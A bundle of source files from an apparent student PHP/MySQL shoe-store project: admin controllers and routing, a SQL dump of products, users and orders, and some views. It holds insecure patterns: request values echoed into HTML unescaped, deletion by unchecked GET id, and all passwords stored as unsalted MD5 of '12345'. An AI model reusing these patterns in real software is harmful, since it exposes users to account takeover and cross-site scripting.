$soluong_them = $value['soluong'] + $soluong;
return $this->sanpham_model->insert_trung($idSP, $soluong_them);
}
}
$this->sanpham_model->insert($idKM, $idLoaiSP, $idcolor, $idsize, $tenSP, $Dongia, $anh1, $anh2, $anh3, $ngaynhap, $mota, $soluong);
//
}
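    // Hedged sketch: them() above loads every product and compares in PHP to
    // find a duplicate; a single parameterized lookup does the same check.
    // Assumes $this->sanpham_model->conn is the model's public mysqli handle.
    public function tim_trung($tenSP, $idcolor, $idsize, $Dongia)
    {
        $stmt = $this->sanpham_model->conn->prepare(
            "SELECT idSP, soluong FROM sanpham
             WHERE tenSP = ? AND idcolor = ? AND idsize = ? AND Dongia = ?");
        $stmt->bind_param('siii', $tenSP, $idcolor, $idsize, $Dongia);
        $stmt->execute();
        return $stmt->get_result()->fetch_assoc(); // null when nothing matches
    }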
public function xoasanpham()
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$this->sanpham_model->delete($id);
}
function them_soluong_giaodien()
{
$data_km = $this->sanpham_model->khuyenmai();
$data_mau = $this->sanpham_model->mau();
$data_size = $this->sanpham_model->size();
$data_lsp = $this->sanpham_model->loaisp();
        // data for the add-stock screen
$idSP = $_GET['idSP'];
$soluong_sanpham = $_GET['soluong'];
require_once('views_admin/index.php');
}
public function them_soluong()
{
$soluong_them = filter_input(INPUT_POST, 'soluong_them');
$soluong_sanpham = filter_input(INPUT_POST, 'soluong_sanpham');
$soluong_tong = $soluong_them + $soluong_sanpham;
$idSP = filter_input(INPUT_POST, 'idSP');
$this->sanpham_model->them_soluong($idSP, $soluong_tong);
}
}
?><file_sep>/shoe_store.sql
-- phpMyAdmin SQL Dump
-- version 4.9.1
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Jan 11, 2021 at 03:48 AM
-- Server version: 10.4.8-MariaDB
-- PHP Version: 7.2.24
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `shoe_store`
--
-- --------------------------------------------------------
--
-- Table structure for table `banner`
--
CREATE TABLE `banner` (
`idbanner` int(11) NOT NULL,
`anh` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `banner`
--
INSERT INTO `banner` (`idbanner`, `anh`) VALUES
(1, 'banner1.jpg'),
(2, 'banner2.jpg'),
(3, 'logo.png');
-- --------------------------------------------------------
--
-- Table structure for table `color`
--
CREATE TABLE `color` (
`idcolor` int(11) NOT NULL,
`color` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `color`
--
INSERT INTO `color` (`idcolor`, `color`) VALUES
(1, 'đỏ'),
(2, 'vàng'),
(3, 'đen'),
(4, 'xám'),
(5, 'xanh'),
(6, 'nâu'),
(7, 'cam'),
(8, 'trắng'),
(9, 'hồng');
-- --------------------------------------------------------
--
-- Table structure for table `gopy`
--
CREATE TABLE `gopy` (
`idgopy` int(11) NOT NULL,
`idSP` int(11) NOT NULL,
`email` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`noidung` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `gopy`
--
INSERT INTO `gopy` (`idgopy`, `idSP`, `email`, `noidung`) VALUES
(1, 1, '<EMAIL>', 'GIÀY TÂY NAM CÔNG SỞ DA'),
(2, 1, '<EMAIL>', 'giày đẹp thiệt'),
(3, 9, '<EMAIL>', 'GIày này cũng ổn'),
(4, 9, '<EMAIL>', 'Giày công sở 2 này đẹp và bền'),
(5, 2, '<EMAIL>', 'Giày này cho học sinh có phù hợp không?'),
(6, 5, '<EMAIL>', 'Giày học ính nam này đẹp, bền '),
(7, 6, '<EMAIL>', 'Giày bền, đẹp và rất đáng tiền'),
(8, 4, '<EMAIL>', 'Giày da bò này là da thiệt nè'),
(9, 3, '<EMAIL>', 'Giày này hợp thời trang này'),
(10, 7, '<EMAIL>', 'GIÀY THỜI TRANG này đẹp và bền á ad'),
(11, 8, '<EMAIL>', 'Loại giày này hợp với mình nè');
-- --------------------------------------------------------
--
-- Table structure for table `hoadon`
--
CREATE TABLE `hoadon` (
`idhoadon` int(11) NOT NULL,
`idUser` int(11) NOT NULL,
`idSP` int(11) NOT NULL,
`tongtien` int(11) NOT NULL,
`trangthai` int(11) NOT NULL,
`soluongmua` int(11) NOT NULL,
`ngaymua` date NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `hoadon`
--
INSERT INTO `hoadon` (`idhoadon`, `idUser`, `idSP`, `tongtien`, `trangthai`, `soluongmua`, `ngaymua`) VALUES
(2, 1, 2, 600, 1, 3, '2020-12-31'),
(4, 1, 7, 700, 1, 2, '2020-12-31'),
(6, 1, 4, 790, 1, 1, '2020-11-25'),
(7, 1, 2, 400, 1, 2, '2021-01-01'),
(8, 1, 4, 790, 1, 1, '2021-01-06'),
(9, 1, 8, 950, 1, 1, '2021-01-09'),
(18, 6, 3, 150, 1, 1, '2021-01-11'),
(19, 1, 3, 150, 1, 1, '2021-01-11');
-- --------------------------------------------------------
--
-- Table structure for table `khuyenmai`
--
CREATE TABLE `khuyenmai` (
`idKM` int(11) NOT NULL,
`loaiKM` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`giatriKM` float NOT NULL,
`ngaybatdau` date NOT NULL,
`ngayketthuc` date NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `khuyenmai`
--
INSERT INTO `khuyenmai` (`idKM`, `loaiKM`, `giatriKM`, `ngaybatdau`, `ngayketthuc`) VALUES
(1, 'Không', 0, '0000-00-00', '0000-00-00'),
(2, 'Sản phẩm mới', 30, '0000-00-00', '0000-00-00'),
(3, 'Khuyến mãi đầu năm', 30, '0000-00-00', '0000-00-00'),
(4, 'Khuyến mãi cuối năm', 30, '0000-00-00', '0000-00-00'),
(5, 'Khuyến mãi theo dịch vu', 30, '0000-00-00', '0000-00-00');
-- --------------------------------------------------------
--
-- Table structure for table `layout`
--
CREATE TABLE `layout` (
`id` int(11) NOT NULL,
`time` varchar(10) COLLATE utf8_unicode_ci NOT NULL,
`mail_1` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`mail_2` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`diachi` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`donvi` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`phone_1` double NOT NULL,
`phone_2` double NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `layout`
--
INSERT INTO `layout` (`id`, `time`, `mail_1`, `mail_2`, `diachi`, `donvi`, `phone_1`, `phone_2`) VALUES
(1, '24/7', '<EMAIL>', '<EMAIL>', 'Làng Đại học, Đà Nẵng', 'Khoa Công Nghệ Thông Tin & Truyền Thông - Đại Học Đà Nẵng VKU', 787700624, 123456789);
-- --------------------------------------------------------
--
-- Table structure for table `loaisanpham`
--
CREATE TABLE `loaisanpham` (
`idLoaiSP` int(11) NOT NULL,
`tenLSP` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`hinhanh` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `loaisanpham`
--
INSERT INTO `loaisanpham` (`idLoaiSP`, `tenLSP`, `hinhanh`) VALUES
(1, 'Giày công sở', 'giaycongso.jpg'),
(2, 'Giày học sinh', 'giayhs2.jpg'),
(3, 'Giày da bò', 'giaydabo.jpg'),
(4, 'Giày thời trang nam', 'giaythoitrang2.jpg');
-- --------------------------------------------------------
--
-- Table structure for table `phanquyen`
--
CREATE TABLE `phanquyen` (
`idQuyen` int(11) NOT NULL,
`tenquyen` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`chitietquyen` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `phanquyen`
--
INSERT INTO `phanquyen` (`idQuyen`, `tenquyen`, `chitietquyen`) VALUES
(1, 'admin', 'quản lý trang web'),
(0, 'customer', 'khách hàng quen'),
(2, 'banhang', 'Nhân viên bán hàng');
-- --------------------------------------------------------
--
-- Table structure for table `sanpham`
--
CREATE TABLE `sanpham` (
`idSP` int(11) NOT NULL,
`idKM` int(11) NOT NULL,
`idLoaiSP` int(11) NOT NULL,
`idcolor` int(11) NOT NULL,
`idsize` int(11) NOT NULL,
`tenSP` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`Dongia` int(11) NOT NULL,
`anh1` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`anh2` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`anh3` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`ngaynhap` date NOT NULL,
`mota` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`soluong` int(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `sanpham`
--
INSERT INTO `sanpham` (`idSP`, `idKM`, `idLoaiSP`, `idcolor`, `idsize`, `tenSP`, `Dongia`, `anh1`, `anh2`, `anh3`, `ngaynhap`, `mota`, `soluong`) VALUES
(1, 2, 1, 1, 5, 'Giày Tây Nam Công Sở Da', 130, 'Giày Tây Nam Công Sở Da1.jpg', 'Giày Tây Nam Công Sở Da2.jpg', 'Giày Tây Nam Công Sở Da3.jpg', '2020-12-15', '<p>Form giày ôm chân, thiết kế phù hợp với mọi độ tuổi<br />Chất liệu: Da tổng hợp cao cấp, đẹp và bền.<br />Phần đế thiết kế thời trang hiện đại, rãnh chống trơn đặc biệt<br />Đường chỉ may tỉ mỉ, tinh tế<br />Phối', 9),
(2, 1, 2, 2, 6, 'giày học sinh1', 200, 'Giày học sinh1.jpg', 'Giày học sinh11.jpg', 'Giày học sinh12.jpg', '2020-12-16', '<p>Với thiết kế vải cavans rất ôm chân và phần đế boost mềm mại ♥ Phù hợp cho đi học, tập gym, đi chơi,.v. v. V. ♥ các bạn bấm mua ngay để xem có size của mình không nhá ♥ ng', 46),
(3, 1, 4, 3, 7, '<NAME>11', 150, 'giaythoitrang1.jpeg', 'giaythoitrang2.jpeg', 'giaythoitrang3.jpeg', '2020-12-15', '<ul><li>Thể thao và thời trang</li><li>Giày vải đế cao su mềm đi êm chân</li><li>Size 39 đến 44</li></ul>', 48),
(4, 1, 3, 4, 8, 'Giày Lười Da Bò QS49', 790, 'giaydabo.jpg', 'giaydabo.jpg', 'giaydabo.jpg', '2020-12-15', '<p>Giày Lười Da Bò QS49</p>', 45),
(5, 1, 2, 5, 9, 'giày học sinh', 900, 'giayhs2.jpg', 'giayhs2.jpg', 'giayhs2.jpg', '2020-12-09', '<p><strong><em>giày học sinh nam đẹp</em></strong></p>', 9),
(6, 2, 2, 2, 2, 'giày học sinh nam đẹp', 650, 'giayhs3.jpg', 'giayhs3.jpg', 'giayhs3.jpg', '2020-12-23', '<p>giày học sinh đẹp, bền.</p>', 50),
(7, 2, 4, 6, 10, 'Giày thời trang', 350, 'giaythoitrang2.jpeg', 'giaythoitrang2.jpeg', 'giaythoitrang2.jpeg', '2020-12-15', '<p>GIày thời trang nam đẹp</p>', 5),
(8, 2, 4, 2, 2, 'Giày thời trang', 950, 'giaythoitrang2.jpg', 'giaythoitrang2.jpg', 'giaythoitrang2.jpg', '2020-12-15', '<p><em><strong>Giày thời trang đẹp và bền</strong></em></p>', 49),
(9, 2, 1, 8, 9, 'Giày công sở 2', 300, 'congso.jpg', 'congso.jpg', 'congso.jpg', '2020-12-15', '<p><strong>Giày công sở nam đẹp nhất</strong></p>', 50),
(21, 1, 3, 3, 11, 'Giày da bò nam đẹp', 500, 'loaisanphamgiaydabo.jpg', 'loaisanphamgiaydabo.jpg', 'loaisanphamgiaydabo.jpg', '2021-01-09', '<p><strong><em>Giày da bò nam đẹp, phù hợp với nam giới, giúp bạn lịch lãm hơn</em></strong></p>', 498);
-- --------------------------------------------------------
--
-- Table structure for table `size`
--
CREATE TABLE `size` (
`idsize` int(11) NOT NULL,
`size` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `size`
--
INSERT INTO `size` (`idsize`, `size`) VALUES
(1, 25),
(2, 26),
(3, 27),
(4, 28),
(5, 29),
(6, 30),
(7, 31),
(8, 32),
(9, 33),
(10, 34),
(11, 35),
(12, 36),
(13, 37),
(14, 38),
(15, 39),
(16, 40),
(17, 41),
(18, 42),
(19, 43),
(20, 44),
(21, 45);
-- --------------------------------------------------------
--
-- Table structure for table `user`
--
CREATE TABLE `user` (
`idUser` int(11) NOT NULL,
`ho` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`ten` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`email` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`diachi` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`gioitinh` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`sodienthoai` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`tendangnhap` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`matkhau` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`idQuyen` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `user`
--
INSERT INTO `user` (`idUser`, `ho`, `ten`, `email`, `diachi`, `gioitinh`, `sodienthoai`, `tendangnhap`, `matkhau`, `idQuyen`) VALUES
(1, 'Quản', '<NAME>', '<EMAIL>', 'đà nẵng', 'Nam', '0787700624', 'admin', '827ccb0eea8a706c4c34a16891f84e7b', 1),
(2, 'abc', 'abc', '<EMAIL>', 'đà nẵng', 'nam', '091208934734', 'abc', '827ccb0eea8a706c4c34a16891f84e7b', 0),
(3, 'bán', 'hàng', '<EMAIL>', 'đà nẵng', 'nam', '091208934734', 'banhang', '827ccb0eea8a706c4c34a16891f84e7b', 2),
(4, 'Mai', 'Nhựt', '<EMAIL>', 'quảng nam', 'nam', '0987765442', 'mainhut', '827ccb0eea8a706c4c34a16891f84e7b', 0),
(5, 'đào', 'nguyên', '<EMAIL>', 'daklak', 'nam', '0987765442', 'daonguyen', '827ccb0eea8a706c4c34a16891f84e7b', 0),
(6, 'tin', 'ngô', '<EMAIL>', '<NAME>', 'nam', '111111111111', 'ngotin', '827ccb0eea8a706c4c34a16891f84e7b', 0);
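--
-- Note: every matkhau value above is the unsalted MD5 digest of '12345'
-- (md5('12345') = 827ccb0eea8a706c4c34a16891f84e7b); the quenmk view also
-- tells users that the reset password is 12345, which matches this hash.
--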
--
-- Indexes for dumped tables
--
--
-- Indexes for table `banner`
--
ALTER TABLE `banner`
ADD PRIMARY KEY (`idbanner`);
--
-- Indexes for table `color`
--
ALTER TABLE `color`
ADD PRIMARY KEY (`idcolor`);
--
-- Indexes for table `gopy`
--
ALTER TABLE `gopy`
ADD PRIMARY KEY (`idgopy`);
--
-- Indexes for table `hoadon`
--
ALTER TABLE `hoadon`
ADD PRIMARY KEY (`idhoadon`),
ADD KEY `sanpham` (`idSP`),
ADD KEY `idUser` (`idUser`);
--
-- Indexes for table `khuyenmai`
--
ALTER TABLE `khuyenmai`
ADD PRIMARY KEY (`idKM`);
--
-- Indexes for table `layout`
--
ALTER TABLE `layout`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `loaisanpham`
--
ALTER TABLE `loaisanpham`
ADD PRIMARY KEY (`idLoaiSP`);
--
-- Indexes for table `phanquyen`
--
ALTER TABLE `phanquyen`
ADD PRIMARY KEY (`idQuyen`);
--
-- Indexes for table `sanpham`
--
ALTER TABLE `sanpham`
ADD PRIMARY KEY (`idSP`),
ADD KEY `idLoaiSP` (`idLoaiSP`),
ADD KEY `idKM` (`idKM`),
ADD KEY `idcolor` (`idcolor`),
ADD KEY `idsize` (`idsize`);
--
-- Indexes for table `size`
--
ALTER TABLE `size`
ADD PRIMARY KEY (`idsize`);
--
-- Indexes for table `user`
--
ALTER TABLE `user`
ADD PRIMARY KEY (`idUser`),
ADD KEY `idQuyen` (`idQuyen`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `banner`
--
ALTER TABLE `banner`
MODIFY `idbanner` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;
--
-- AUTO_INCREMENT for table `color`
--
ALTER TABLE `color`
MODIFY `idcolor` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;
--
-- AUTO_INCREMENT for table `gopy`
--
ALTER TABLE `gopy`
MODIFY `idgopy` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=12;
--
-- AUTO_INCREMENT for table `hoadon`
--
ALTER TABLE `hoadon`
MODIFY `idhoadon` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=20;
--
-- AUTO_INCREMENT for table `khuyenmai`
--
ALTER TABLE `khuyenmai`
MODIFY `idKM` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;
--
-- AUTO_INCREMENT for table `layout`
--
ALTER TABLE `layout`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT for table `loaisanpham`
--
ALTER TABLE `loaisanpham`
MODIFY `idLoaiSP` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `phanquyen`
--
ALTER TABLE `phanquyen`
MODIFY `idQuyen` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT for table `sanpham`
--
ALTER TABLE `sanpham`
MODIFY `idSP` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=73;
--
-- AUTO_INCREMENT for table `size`
--
ALTER TABLE `size`
MODIFY `idsize` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=22;
--
-- AUTO_INCREMENT for table `user`
--
ALTER TABLE `user`
MODIFY `idUser` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `hoadon`
--
ALTER TABLE `hoadon`
ADD CONSTRAINT `hoadon_ibfk_1` FOREIGN KEY (`idUser`) REFERENCES `user` (`idUser`) ON DELETE CASCADE ON UPDATE CASCADE;
--
-- Constraints for table `sanpham`
--
ALTER TABLE `sanpham`
ADD CONSTRAINT `sanpham_ibfk_1` FOREIGN KEY (`idLoaiSP`) REFERENCES `loaisanpham` (`idLoaiSP`) ON DELETE CASCADE ON UPDATE CASCADE,
ADD CONSTRAINT `sanpham_ibfk_2` FOREIGN KEY (`idsize`) REFERENCES `size` (`idsize`);
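--
-- Hedged sketch (not part of the original dump): `sanpham` also keeps the
-- indexed `idKM` and `idcolor` columns; if referential integrity is wanted
-- for them as well, constraints in the existing naming scheme would be:
--
-- ALTER TABLE `sanpham`
--   ADD CONSTRAINT `sanpham_ibfk_3` FOREIGN KEY (`idKM`) REFERENCES `khuyenmai` (`idKM`),
--   ADD CONSTRAINT `sanpham_ibfk_4` FOREIGN KEY (`idcolor`) REFERENCES `color` (`idcolor`);
--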
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/admin/views_admin/sanpham/them_soluong.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">Thêm số lượng </div>
<div class="panel-body">
<form method="POST" action="?action=them_soluong" enctype="multipart/form-data">
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Số lượng nhập thêm</div>
<div class="col-md-10">
<input type="hidden" value="<?php echo $idSP; ?>" name="idSP" required>
<input type="hidden" value="<?php echo $soluong_sanpham; ?>" name="soluong_sanpham" required>
<input type="text" value="" name="soluong_them" required>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="create" class="btn btn-primary">Thêm</button>
</div>
</div>
<!-- end rows -->
</form>
</div>
</div>
</div><file_sep>/model/show_home.php
<?php
require_once('ketnoi.php');
/**
 * Home page data access: banners, product categories, products, layout.
 */
class home
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function banner() //ok
{
$query = "SELECT * from banner";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function loaisanpham() // in progress
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function loaisanphamHome() // in progress
{
$query = "SELECT * from loaisanpham limit 3";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function allsanpham_trangchu() // in progress
{
$query = "SELECT * from sanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function sanpham_trangchu() // in progress
{
$query = "SELECT * from sanpham ORDER BY soluong ASC limit 0,6";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function layout()
{
$query = "SELECT * FROM layout";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
}
?><file_sep>/admin/index.php
<?php
session_start();
$act = isset($_GET['action']) ? $_GET['action'] : "trangchu";
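// Front controller: the `action` query parameter selects a case below,
// e.g. index.php?action=xemsanpham&id=3 runs the product-detail flow.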
switch ($act) {
case 'trangchu':
require_once('controller_admin/home.php');
$controller_taikhoanobj = new trangchucontroller();
$controller_taikhoanobj->dem();
break;
case 'sualayout':
require_once('controller_admin/home.php');
$controller_taikhoanobj = new trangchucontroller();
$controller_taikhoanobj->update_layout();
break;
case 'xoalayout':
unset($_SESSION['mail']);
unset($_SESSION['phone']);
unset($_SESSION['diachi']);
require_once('controller_admin/home.php');
$controller_taikhoanobj = new trangchucontroller();
$controller_taikhoanobj->dem();
break;
case 'taikhoan': // account info listing works
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->list();
break;
// case 'danhmuc':
// require_once('controller_admin/danhmucsanpham.php');
// break;
case 'xemnguoidung':
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->details();
break;
case 'edit': // UPDATE form (view)
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->edit();
break;
case 'sua_xl': // UPDATE handler
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->update();
break;
case 'them_giaodien':
require_once('views_admin/index.php');
break;
case 'them':
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->them();
break;
case 'xoanguoidung':
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->xoanguoidung();
break;
case 'phanquyen':
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->phanquyen();
break;
case 'sanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->list();
break;
case 'xemsanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->details();
break;
case 'suasanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->details();
break;
case 'suasanpham_xl':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->update();
break;
case 'them_sanpham_giaodien':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->them_giaodien();
break;
case 'them_soluong_giaodien':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->them_soluong_giaodien();
break;
case 'them_sanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->them();
break;
case 'them_soluong':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->them_soluong();
break;
case 'xoasanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->xoasanpham();
break;
// product categories
case 'loaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->list();
break;
case 'xemloaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->details();
break;
case 'sualoaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->details();
break;
case 'sualoaisanpham_xl':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->update();
break;
case 'themloaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->them();
break;
case 'xoaloaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->xoaloaisanpham();
break;
case 'themloaisanpham_giaodien':
require_once('views_admin/index.php');
break;
// invoices
case 'hoadon':
require_once('controller_admin/duyethoadon.php');
$controller_taikhoanobj = new hoadoncontroller();
$controller_taikhoanobj->list();
break;
case 'xoahoadon':
require_once('controller_admin/duyethoadon.php');
$controller_taikhoanobj = new hoadoncontroller();
$controller_taikhoanobj->xoahoadon();
break;
case 'xemhoadon':
require_once('controller_admin/duyethoadon.php');
$controller_taikhoanobj = new hoadoncontroller();
$controller_taikhoanobj->chitiet_hoadon();
break;
case 'duyethoadon':
require_once('controller_admin/duyethoadon.php');
$controller_taikhoanobj = new hoadoncontroller();
$controller_taikhoanobj->duyet_hoadon();
break;
//banner
case 'banner':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->list();
break;
case 'suabanner':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->details();
break;
case 'suabanner_xl':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->update();
break;
case 'thembanner':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->them();
break;
case 'xoabanner':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->xoabanner();
break;
case 'thembanner_giaodien':
require_once('views_admin/index.php');
break;
// promotions
case 'khuyenmai':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->list();
break;
case 'xemkhuyenmai':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->details();
break;
case 'suakhuyenmai_giaodien':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->details();
break;
case 'suakhuyenmai_xl':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->update();
break;
case 'themkhuyenmai_xl':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->them();
break;
case 'xoakhuyenmai':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->xoakhuyenmai();
break;
case 'themkhuyenmai_giaodien':
require_once('views_admin/index.php');
break;
default:
require_once('controller_admin/home.php');
break;
}
?><file_sep>/views/footer/footer.php
<!-- footer top area start -->
<div class="footer-top-area">
<div class="container">
<div class="row">
<div class="col-md-6 col-sm-4">
<div class="footer-contact">
<div style="text-align:center">
<h3 style="color:#fff">Hồng An Store</h3>
<p>Uy tín - Chất lượng - Thời thượng</p>
</div>
<ul class="address">
<li>
<span class="fa fa-fax"></span>
<?php echo $_SESSION['diachi'] ?>
</li>
<li>
<span class="fa fa-phone"></span>
<?php echo '(+84) '.$_SESSION['phone']; ?>
</li>
